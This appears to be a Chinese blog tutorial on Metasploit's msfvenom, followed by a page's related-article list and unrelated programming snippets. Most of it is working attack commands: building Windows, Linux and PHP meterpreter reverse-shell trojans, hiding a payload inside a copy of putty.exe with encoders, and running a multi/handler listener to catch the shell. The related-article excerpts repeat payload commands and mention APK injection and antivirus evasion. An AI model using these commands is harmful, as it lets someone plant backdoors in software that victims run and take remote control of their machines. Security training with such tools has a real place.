msfvenom的使用
msfvenom也只metasploit中的一个很强的工具,msfvenom生成木马非常的迅速可以各种版本的木马
该工具由msfpaylod和msfencodes的组成
生成木马是需要在本地监听,等待木马上线即可。该步骤在meterpretr的使用有使用到
命令
这里我们主要讲解msfvenom的命令
| 命令 | 参数 |
|---|---|
| -l | 列出指定模块中payload的数量,payload.nops.all...... |
| -p | 指定使用的payload |
| -f | 指定输出文件的格式,例如 exe、elf |
| -e | 指定编码类型 |
| -i | 编码次数 |
| -a | 指定目标结构,例如x86、x64 |
| -o | 导出木马的位置 |
| -b | 木马中不能出现的字符 |
| -x | 将payload加入到的文件 |
| -k | 将payload加入到原文件的复制中 |
查找模块
msfvenom -l platforms查看支持的平台

参数很长,可能记不清楚,那么我们只需要输入一个错误的模块,msfvenom会提示我们可以查看那些

可以看到我们可以查询的模块
例如我们想要查找一个windows带有meterpreter控制台的,我们可以执行
msfvenom -l payloads|grep windows|grep meterpreter

这里已经找到了相关的模块
msfvenom -l encoders,查看可用的编码模块

生成一个windows木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -f exe -o /root/shell.exe

生成一个linux木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -f elf -o /root/shell.elf

将我们的木马加入到exe文件
这里由常用的远程连接工具putty为例
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -x putty.exe -k -a x86 -e x86/shikata_ga_nai -i 2 -f exe -o super_putty.exe
注意:-a指定结构,x指定文件,-e指定编码方式,-i指定编码次数

这里编码并没有成功导出文件,报错了,提示我们溢出,正常情况下是可以成功的
后续我换了一个putty的版本成功了
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.102 LPORT=1234 -x putty.exe -k -e ruby/base64 -i 1 -f exe -o S_putty.exe
于上次不同这次使用的是ruby/base64加密


将木马共享到windows电脑上指定putty,
在本机设置监听,在windows电脑上执行我们的木马,查看是否可以反弹shell
use exploit/multi\handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.102
set LPORT 1234
run

这里我并没有反弹成功,在靶机执行程序崩溃了,出了些问题,但是我们的命令没有出问题,可以再换一个程序试一试

之前测试是可以成功的
php反弹
查找phppayload


msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.102 LPORT=1234 -f raw > shell.php
这里反弹shell我是成功了,但是使用shell连接执行命令的时候总是断开,可能不支持吧,这里还是建议手写的一句话木马

在linux中我尝试的时候,无法反弹shell
msfvenom的使用的更多相关文章
- msfvenom向apk注入payload
首先安装apt-get install apkinjector 这个东西,msfvenom重新组装apk的时候会自动调用 msfvenom -x /路径/apk android/meterpreter ...
- 【转】msfvenom使用指南
msfvenom命令行选项如下: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用'- ...
- Msfvenom学习总结
1. –p (- -payload-options) 添加载荷payload. 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填 ...
- msfvenom生成各类Payload命令
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayl ...
- Msfvenom木马使用及TheFatRat工具
msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUN ...
- msfvenom生成linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=port -f elf > shell.elf
- msfvenom木马生成+免杀+壳(实测并不能免杀)
msfvenom 选项: -p, --payload 有效载荷使用.指定一个有效的自定义载荷 --payload-options 列出有效载荷的标准选项 -l, --list [type] 列出一个模 ...
- 【译】msfvenom
原文链接:MSFvenom 1.使用MSFvenom命令行界面 msfvenom是Msfpayload和Msfencode的组合,将这两个工具集成在一个框架实例中. msfvenom的优点是: 一个单 ...
- 转: kali msfvenom生成木马
kali msfvenom生成木马 转:https://blog.csdn.net/qq_33391644/article/details/79266724 msfvenom是msfpayload,m ...
- Msfvenom学习总结-MSF反弹webshell
1. –p (- -payload-options) 添加载荷payload. 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填 ...
随机推荐
- Date 日期字符串自定义格式化
Date.prototype.Format = function (fmt) { var o = { "M+": this.getMonth() + 1, //月份 "d ...
- jmeter参数化时最常用随机函数
邮箱类: ${__RandomString(8,abcdefghijklmnopqrstuvwxyz,)}@126.com 手机号类: ${__Random(18000000000,189999999 ...
- 为知笔记快速隐藏左侧 快捷键 Esc
为知笔记快速隐藏左侧 快捷键 Esc
- Stream操作
public static void main(String[] args) { List<Parking> parkings = Arrays.asList(Parking.builde ...
- JDBC概念和基本用法
概念: JDBC (Java DataBase Connectivity):Java数据库连接,Java语言操作数据库.是官方(sun公司)定义的一套操作所有关系型数据库的规则, 即接口.各个 ...
- C#访问MySQL(一):连接查询删除(查删)
前言: 通过C#连接访问MySQL:连接查询. 1.项目添加MySQL引用: 2.获取数据库一个满足条件的值: public static object GetSingle2(string SQLSt ...
- Shell脚本基本命令5
1.sort的稳定性 例以前面两个字段为键值,排序这四行 $ sort -t_ -k1,1 -k2,2 <<EOF one_two one_two_three one_two_four ...
- Executor框架详解
Executor框架详解 java的线程既是工作单元,也是执行机制.从jdk5开始,把工作单元与执行机制分离开来.工作单元包括Runnable和Callable,而执行机制由Executor框架提供. ...
- PTA1003 我要通过! (20 分)
PTA1003 我要通过! (20 分) "答案正确"是自动判题系统给出的最令人欢喜的回复.本题属于 PAT 的"答案正确"大派送 -- 只要读入的字符串满足下 ...
- mysql授权、导入等基本操作
1.授权: mysqladmin -uroot password rootpwd mysql -uroot -prootpwd mysql -e "INSERT INTO user (Hos ...